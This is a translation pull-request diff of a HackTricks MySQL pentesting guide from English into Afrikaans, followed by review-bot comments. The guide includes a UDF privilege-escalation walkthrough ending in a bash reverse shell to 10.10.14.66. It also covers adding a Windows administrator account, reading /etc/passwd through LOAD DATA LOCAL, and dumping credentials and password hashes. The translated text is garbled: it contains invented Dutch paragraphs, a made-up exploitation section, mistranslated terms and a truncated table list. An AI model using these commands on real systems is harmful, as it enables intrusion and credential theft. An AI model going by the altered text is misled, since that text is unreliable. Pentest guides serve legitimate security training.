| +| **default\_language\_lcid** | **int** |

Van toepassing op: SQL Server 2012 (11.x) en later.

Dui die verstek LCID vir hierdie beginsel aan.

| +| **allow\_encrypted\_value\_modifications** | **bit** |

Van toepassing op: SQL Server 2016 (13.x) en later, SQL-databasis.

Onderdruk kriptografiese metadata kontroles op die bediener in massa-kopieerhandelinge. Dit stel die gebruiker in staat om data wat altyd versleutel is, tussen tabelle of databasisse te kopieer sonder om die data te ontsluit. Die verstek is AF.

|
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
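Review bot: the table in hunk @@ -1,45 +1,45 @@ translates "principal" as "beginsel", which means "principle"; these rows describe security principals (users, roles, groups), so "prinsipaal" or the untranslated "principal" is needed for the text to make sense. In the same hunk, "Null"/"NULL" in the `default_schema_name` and `sid` rows is the SQL NULL value and should stay `NULL` rather than "Nul" (zero), and "Always Encrypted" in the `allow_encrypted_value_modifications` row is a SQL Server feature name and should not be rendered as "altyd versleutel".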
diff --git a/network-services-pentesting/pentesting-mysql.md b/network-services-pentesting/pentesting-mysql.md index a4f31a266..acb91f5b0 100644 --- a/network-services-pentesting/pentesting-mysql.md +++ b/network-services-pentesting/pentesting-mysql.md @@ -2,75 +2,74 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## **Basic Information** +## **Basiese Inligting** -**MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available at no cost. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases. - -**Default port:** 3306 +**MySQL** kan beskryf word as 'n oopbron **Relational Database Management System (RDBMS)** wat gratis beskikbaar is. Dit werk met die **Structured Query Language (SQL)**, wat die bestuur en manipulasie van databasisse moontlik maak. +**Verstekpoort:** 3306 ``` 3306/tcp open mysql ``` +## **Verbind** -## **Connect** - -### **Local** - +### **Lokaal** ```bash mysql -u root # Connect to root without password mysql -u root -p # A password will be asked (check someone) ``` +### Afstandbediening -### Remote +MySQL kan op afstand worden benaderd via het netwerk. Dit betekent dat een aanvaller toegang kan krijgen tot de MySQL-server vanaf een externe locatie. Dit kan worden gedaan door het IP-adres en de poort van de MySQL-server te achterhalen en vervolgens een verbinding tot stand te brengen met behulp van een MySQL-client. +Om te voorkomen dat een aanvaller toegang krijgt tot de MySQL-server via externe verbindingen, moet de configuratie van de MySQL-server worden aangepast. 
Dit kan worden gedaan door de bind-address-instelling in het configuratiebestand van MySQL te wijzigen. Door deze instelling te wijzigen in het IP-adres van de lokale machine, wordt voorkomen dat externe verbindingen worden geaccepteerd. + +Het is ook belangrijk om sterke en veilige wachtwoorden te gebruiken voor de MySQL-gebruikersaccounts. Dit helpt bij het voorkomen van brute force-aanvallen waarbij een aanvaller probeert in te loggen op de MySQL-server door verschillende combinaties van gebruikersnamen en wachtwoorden te proberen. + +Daarnaast is het belangrijk om de MySQL-server regelmatig bij te werken met de nieuwste beveiligingspatches. Dit helpt bij het dichten van eventuele beveiligingslekken die kunnen worden misbruikt door aanvallers. + +Ten slotte kan het gebruik van een firewall ook helpen bij het beperken van de toegang tot de MySQL-server. Door alleen specifieke IP-adressen toe te staan ​​om verbinding te maken met de MySQL-server, kan de blootstelling aan externe aanvallen worden verminderd. 
```bash mysql -h -u root mysql -h -u root@localhost ``` +## Eksterne Enumerasie -## External Enumeration - -Some of the enumeration actions require valid credentials - +Sommige van die enumerasie-aksies vereis geldige geloofsbriewe ```bash nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 msf> use auxiliary/scanner/mysql/mysql_version msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds msf> use auxiliary/admin/mysql/mysql_enum #Creds -msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds +msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#mysql) -### Write any binary data - +### Skryf enige binêre data neer ```bash CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY) CONVERT(from_base64("aG9sYWFhCg=="), BINARY) ``` - -## **MySQL commands** - +## **MySQL-opdragte** ```bash show databases; use ; 
@@ -107,9 +106,61 @@ quit; mysql -u username -p < manycommands.sql #A file with all the commands you want to execute mysql -u root -h 127.0.0.1 -e 'show databases;' ``` +### MySQL Toestemmingsopsporing -### MySQL Permissions Enumeration +MySQL-toestemmingsopsporing is een belangrijk onderdeel van het pentestproces, omdat het helpt bij het identificeren van mogelijke beveiligingslekken in een MySQL-database. Door de toestemmingsinstellingen van een MySQL-gebruiker te controleren, kunnen we bepalen welke acties de gebruiker kan uitvoeren op de database. +Hier zijn enkele methoden die kunnen worden gebruikt om MySQL-toestemmingen te onderzoeken: + +#### 1. Gebruikerslijst weergeven + +Om de lijst met gebruikers in een MySQL-database weer te geven, kunnen we de volgende query uitvoeren: + +```sql +SELECT user FROM mysql.user; +``` + +#### 2. Toestemmingen van een specifieke gebruiker controleren + +Om de toestemmingen van een specifieke gebruiker te controleren, kunnen we de volgende query uitvoeren: + +```sql +SHOW GRANTS FOR 'gebruikersnaam'@'localhost'; +``` + +#### 3. Toegang tot databases controleren + +Om te controleren welke databases een gebruiker kan benaderen, kunnen we de volgende query uitvoeren: + +```sql +SHOW DATABASES; +``` + +#### 4. Toegang tot tabellen controleren + +Om te controleren welke tabellen een gebruiker kan benaderen, kunnen we de volgende query uitvoeren: + +```sql +SHOW TABLES FROM 'databasenaam'; +``` + +#### 5. Toegang tot kolommen controleren + +Om te controleren welke kolommen een gebruiker kan benaderen, kunnen we de volgende query uitvoeren: + +```sql +SHOW COLUMNS FROM 'databasenaam'.'tabelnaam'; +``` + +#### 6. 
Toegang tot specifieke SQL-opdrachten controleren + +Om te controleren of een gebruiker specifieke SQL-opdrachten kan uitvoeren, kunnen we de volgende query uitvoeren: + +```sql +SHOW GRANTS FOR 'gebruikersnaam'@'localhost' LIKE '%opdracht%'; +``` + +Het controleren van MySQL-toestemmingen is essentieel om mogelijke beveiligingslekken te identificeren en de beveiliging van een MySQL-database te verbeteren. Door deze methoden toe te passen, kunnen we de toegangsrechten van gebruikers nauwkeurig beoordelen en eventuele kwetsbaarheden opsporen. ```sql #Mysql SHOW GRANTS [FOR user]; @@ -121,7 +172,7 @@ SHOW GRANTS FOR CURRENT_USER(); SELECT * FROM mysql.user; #From DB -select * from mysql.user where user='root'; +select * from mysql.user where user='root'; ## Get users with file_priv select user,file_priv from mysql.user where file_priv='Y'; ## Get users with Super_priv 
@@ -132,70 +183,62 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT #@ Functions not from sys. db SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys'; ``` +Jy kan in die dokumentasie die betekenis van elke voorreg sien: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute) -You can see in the docs the meaning of each privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute) - -### MySQL File RCE +### MySQL-lêer RCE {% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %} [mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md) {% endcontent-ref %} -## MySQL arbitrary read file by client - -Actually, when you try to **load data local into a table** the **content of a file** the MySQL or MariaDB server asks the **client to read it** and send the content. **Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.**\ -Please notice that this is the behaviour using: +## MySQL willekeurige lees van lêer deur klient +Eintlik, wanneer jy probeer om **data plaaslik in 'n tabel te laai**, vra die MySQL- of MariaDB-bediener die **kliënt om dit te lees** en die inhoud te stuur. 
**As jy dus 'n mysql-kliënt kan manipuleer om na jou eie MySQL-bediener te verbind, kan jy willekeurige lêers lees.**\ +Let asseblief daarop dat dit die gedrag is wanneer jy gebruik maak van: ```bash load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; ``` - -(Notice the "local" word)\ -Because without the "local" you can get: - +(Notisie die "plaaslike" woord)\ +Want sonder die "plaaslike" kan jy kry: ```bash mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement ``` - -**Initial PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\ -**In this paper you can see a complete description of the attack and even how to extend it to RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\ -**Here you can find an overview of the attack:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/) +**Aanvanklike PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\ +**In hierdie dokument kan jy 'n volledige beskrywing van die aanval sien en selfs hoe om dit uit te brei na RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\ +**Hier kan jy 'n oorsig van die aanval vind:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/) ​
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheid geleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n broeiplek vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} ## POST -### Mysql User - -It will be very interesting if mysql is running as **root**: +### Mysql-gebruiker +Dit sal baie interessant wees as mysql as **root** uitgevoer word: ```bash cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user" systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1 ``` +#### Gevaarlike Instellings van mysqld.cnf -#### Dangerous Settings of mysqld.cnf +In die konfigurasie van MySQL-dienste word verskeie instellings gebruik om sy werking en veiligheidsmaatreëls te definieer: -In the configuration of MySQL services, various settings are employed to define its operation and security measures: - -- The **`user`** setting is utilized for designating the user under which the MySQL service will be executed. -- **`password`** is applied for establishing the password associated with the MySQL user. -- **`admin_address`** specifies the IP address that listens for TCP/IP connections on the administrative network interface. -- The **`debug`** variable is indicative of the present debugging configurations, including sensitive information within logs. -- **`sql_warnings`** manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs. 
-- With **`secure_file_priv`**, the scope of data import and export operations is constrained to enhance security. +- Die **`user`**-instelling word gebruik om die gebruiker aan te dui waarin die MySQL-diens uitgevoer sal word. +- **`password`** word gebruik om die wagwoord wat verband hou met die MySQL-gebruiker, te vestig. +- **`admin_address`** spesifiseer die IP-adres wat luister vir TCP/IP-verbindings op die administratiewe netwerkinterface. +- Die **`debug`**-veranderlike dui op die huidige foutopsporingskonfigurasies, insluitend sensitiewe inligting binne loglêers. +- **`sql_warnings`** bestuur of inligtingstrengs gegenereer word vir enkelry-invoegingsopdragte wanneer waarskuwings voorkom, insluitend sensitiewe data binne loglêers. +- Met **`secure_file_priv`** word die omvang van data-invoer- en uitvoeroperasies beperk om die veiligheid te verbeter. -### Privilege escalation - +### Voorregverhoging ```bash # Get current user (an all users) privileges and hashes use mysql; 
@@ -213,24 +256,20 @@ grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mys # Get a shell (with your permissions, usefull for sudo/suid privesc) \! sh ``` +### Voorregverhoging via biblioteek -### Privilege Escalation via library +As die **mysql-bediener as root** (of 'n ander meer bevoorregte gebruiker) loop, kan jy dit dwing om opdragte uit te voer. Hiervoor moet jy **gebruikersgedefinieerde funksies** gebruik. En om 'n gebruikersgedefinieerde funksie te skep, het jy 'n **biblioteek** nodig vir die bedryfstelsel waarop mysql loop. -If the **mysql server is running as root** (or a different more privileged user) you can make it execute commands. For that, you need to use **user defined functions**. And to create a user defined you will need a **library** for the OS that is running mysql. - -The malicious library to use can be found inside sqlmap and inside metasploit by doing **`locate "*lib_mysqludf_sys*"`**. The **`.so`** files are **linux** libraries and the **`.dll`** are the **Windows** ones, choose the one you need. - -If you **don't have** those libraries, you can either **look for them**, or download this [**linux C code**](https://www.exploit-db.com/exploits/1518) and **compile it inside the linux vulnerable machine**: +Die skadelike biblioteek wat gebruik moet word, kan binne sqlmap en binne metasploit gevind word deur **`locate "*lib_mysqludf_sys*"`** uit te voer. Die **`.so`** lêers is **Linux**-biblioteke en die **`.dll`** is die **Windows**-eenhede, kies die een wat jy benodig. +As jy **nie daardie biblioteke het nie**, kan jy dit óf **soek**, óf hierdie [**Linux C-kode**](https://www.exploit-db.com/exploits/1518) aflaai en **dit binne die kwesbare Linux-masjien kompileer**: ```bash gcc -g -c raptor_udf2.c gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc ``` - -Now that you have the library, login inside the Mysql as a privileged user (root?) 
and follow the next steps: +Nou dat jy die biblioteek het, teken binne in die Mysql as 'n bevoorregte gebruiker (root?) en volg die volgende stappe: #### Linux - ```sql # Use a database use mysql; 
@@ -250,9 +289,43 @@ create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt'); select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"'); ``` - #### Windows +##### MySQL Service Enumeration + +Om te begin, moet jy die MySQL-diens op die teikenstelsel identifiseer. Jy kan dit doen deur die volgende stappe te volg: + +1. Voer 'n skandering van die teikenstelsel uit om aktiewe poorte te identifiseer. +2. Kyk vir die poortnommer 3306, wat die standaardpoort vir MySQL is. +3. As die poort 3306 oop is, dui dit daarop dat die MySQL-diens op die stelsel loop. + +##### MySQL Service Exploitation + +As jy 'n MySQL-diens op die teikenstelsel geïdentifiseer het, kan jy probeer om dit te misbruik om toegang tot die stelsel te verkry. Hier is 'n paar moontlike aanvalstegnieke: + +1. **Brute force-aanval**: Probeer om in te log by die MySQL-diens deur verskillende gebruikersname en wagwoorde te probeer. +2. **SQL-injeksie**: Ondersoek die webtoepassings wat met die MySQL-diens gekoppel is, vir moontlike SQL-injeksiekwessies wat jy kan uitbuit om toegang te verkry. +3. **Gebruikersprivilege-uitbreiding**: As jy toegang het tot 'n beperkte gebruikerrekening, probeer om jou gebruikersprivileges uit te brei deur spesiale MySQL-opdragte uit te voer. +4. **Databasislek**: Ondersoek die databasis vir gevoelige inligting soos wagwoorde, kredietkaartinligting, ens. + +##### MySQL Service Post-Exploitation + +As jy toegang tot die MySQL-diens verkry het, kan jy verskeie post-exploitasietegnieke gebruik om verdere toegang tot die stelsel te verkry of om inligting te versamel: + +1. **Gebruikersrekeninguitbreiding**: Skep 'n nuwe gebruikerrekening met hoër privilegeniveaus om verdere toegang tot die stelsel te verkry. +2. **Databasisverkenning**: Ondersoek die databasis vir waardevolle inligting soos gebruikersname, wagwoorde, kredietkaartinligting, ens. +3. 
**Databasismanipulasie**: Verander of verwyder data in die databasis om die werking van die toepassing of die stelsel te beïnvloed. +4. **Databasisrugsteun**: Maak 'n rugsteunkopie van die databasis om belangrike inligting te bewaar of om dit later te gebruik. + +##### MySQL Service Hardening + +Om die veiligheid van die MySQL-diens te verhoog, kan jy die volgende maatreëls toepas: + +1. **Sterk wagwoorde**: Verseker dat alle gebruikersrekeninge sterk en unieke wagwoorde het. +2. **Beperkte gebruikersprivileges**: Gee slegs die nodige privilegies aan elke gebruikerrekening en beperk die toegang tot kritieke databasisfunksies. +3. **Bywerk van sagteware**: Verseker dat die MySQL-diens en alle verbonde sagteware op die jongste weergawes is om bekende kwessies en lekke te vermy. +4. **Netwerkbeperkings**: Beperk die toegang tot die MySQL-diens deur slegs spesifieke IP-adresse of subnette toe te laat. +5. **Logbestuur**: Monitor en analiseer die loglêers van die MySQL-diens vir enige verdagte aktiwiteite of pogings tot aanvalle. ```sql # CHech the linux comments for more indications USE mysql; 
@@ -264,56 +337,51 @@ CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user npn npn12345678 /add"); SELECT sys_exec("net localgroup Administrators npn /add"); ``` +### Uittreksel van MySQL-gelde van lêers -### Extracting MySQL credentials from files - -Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint** - +Binne _/etc/mysql/debian.cnf_ kan jy die **plain-tekswagwoord** van die gebruiker **debian-sys-maint** vind. ```bash cat /etc/mysql/debian.cnf ``` +Jy kan **hierdie geloofsbriewe gebruik om in die MySQL-databasis in te teken**. -You can **use these credentials to login in the mysql database**. - -Inside the file: _/var/lib/mysql/mysql/user.MYD_ you can find **all the hashes of the MySQL users** (the ones that you can extract from mysql.user inside the database)_._ - -You can extract them doing: +Binne die lêer: _/var/lib/mysql/mysql/user.MYD_ kan jy **al die hasings van die MySQL-gebruikers** vind (diegene wat jy kan onttrek uit mysql.user binne die databasis)_._ +Jy kan hulle onttrek deur die volgende te doen: ```bash grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password" ``` +### Aktivering van logging -### Enabling logging - -You can enable logging of mysql queries inside `/etc/mysql/my.cnf` uncommenting the following lines: +U kan die log van MySQL navrae aktiveer deur die volgende lyne in `/etc/mysql/my.cnf` te ontkommentarieer: ![](<../.gitbook/assets/image (277).png>) -### Useful files +### Nuttige lêers -Configuration Files +Konfigurasie-lêers * windows \* - * config.ini - * my.ini - * windows\my.ini - * winnt\my.ini - * \/mysql/data/ - * unix - * my.cnf - * /etc/my.cnf - * /etc/mysql/my.cnf - * /var/lib/mysql/my.cnf - * \~/.my.cnf - * /etc/my.cnf -* Command History - * \~/.mysql.history -* Log Files - * connections.log - * update.log - * common.log +* config.ini +* my.ini +* windows\my.ini +* winnt\my.ini +* 
\/mysql/data/ +* unix +* my.cnf +* /etc/my.cnf +* /etc/mysql/my.cnf +* /var/lib/mysql/my.cnf +* \~/.my.cnf +* /etc/my.cnf +* Opdraggeskiedenis +* \~/.mysql.history +* Log-lêers +* connections.log +* update.log +* common.log -## Default MySQL Database/Tables +## Standaard MySQL-databasis/tabelle {% tabs %} {% tab title="information_schema" %} @@ -545,18 +613,7 @@ io\_global\_by\_wait\_by\_bytes\ io\_global\_by\_wait\_by\_latency\ latest\_file\_io\ memory\_by\_host\_by\_current\_bytes\ -memory\_by\_thread\_by\_current\_bytes\ -memory\_by\_user\_by\_current\_bytes\ -memory\_global\_by\_current\_bytes\ -memory\_global\_total\ -metrics\ -processlist\ -ps\_check\_lost\_instrumentation\ -schema\_auto\_increment\_columns\ -schema\_index\_statistics\ -schema\_object\_overview\ -schema\_redundant\_indexes\ -schema\_table\_lock\_waits\ +memory\_by\_thread\_by\_current schema\_table\_statistics\ schema\_table\_statistics\_with\_buffer\ schema\_tables\_with\_full\_table\_scans\ 
@@ -630,60 +687,54 @@ x$wait\_classes\_global\_by\_latency\ x$waits\_by\_host\_by\_latency\ x$waits\_by\_user\_by\_latency\ x$waits\_global\_by\_latency -{% endtab %} -{% endtabs %} - -## HackTricks Automatic Commands +## HackTricks Outomatiese Opdragte ``` Protocol_Name: MySql #Protocol Abbreviation if there is one. Port_Number: 3306 #Comma separated if there is more than one. Protocol_Description: MySql #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for MySql - Note: | - MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). +Name: Notes +Description: Notes for MySql +Note: | +MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). - https://book.hacktricks.xyz/pentesting/pentesting-mysql +https://book.hacktricks.xyz/pentesting/pentesting-mysql Entry_2: - Name: Nmap - Description: Nmap with MySql Scripts - Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306 +Name: Nmap +Description: Nmap with MySql Scripts +Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306 Entry_3: - Name: MySql - Description: Attempt to connect to mysql server - Command: mysql -h {IP} -u {Username}@localhost - +Name: MySql +Description: Attempt to connect to mysql server +Command: mysql -h {IP} -u {Username}@localhost + Entry_4: - Name: MySql consolesless mfs enumeration - Description: MySql enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set 
RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit' - +Name: MySql consolesless mfs enumeration +Description: MySql enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit' + ``` - -​ -
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
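Review bot: the `### Afstandbediening` subsection in the `@@ -2,75 +2,74 @@` hunk replaces the original `### Remote` heading, which had no body, with five paragraphs written in Dutch rather than Afrikaans (`MySQL kan op afstand worden benaderd via het netwerk...`), none of which exists in the English source. A translation PR should not introduce new content; drop the inserted paragraphs and keep only the heading, so the `mysql -h -u root` code block follows it directly as in the original. The blank lines that separated headings from fenced blocks (for example before `## **Verbind**` and `### **Lokaal**`) were also removed throughout this hunk; keep the original spacing so the diff stays translation-only.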
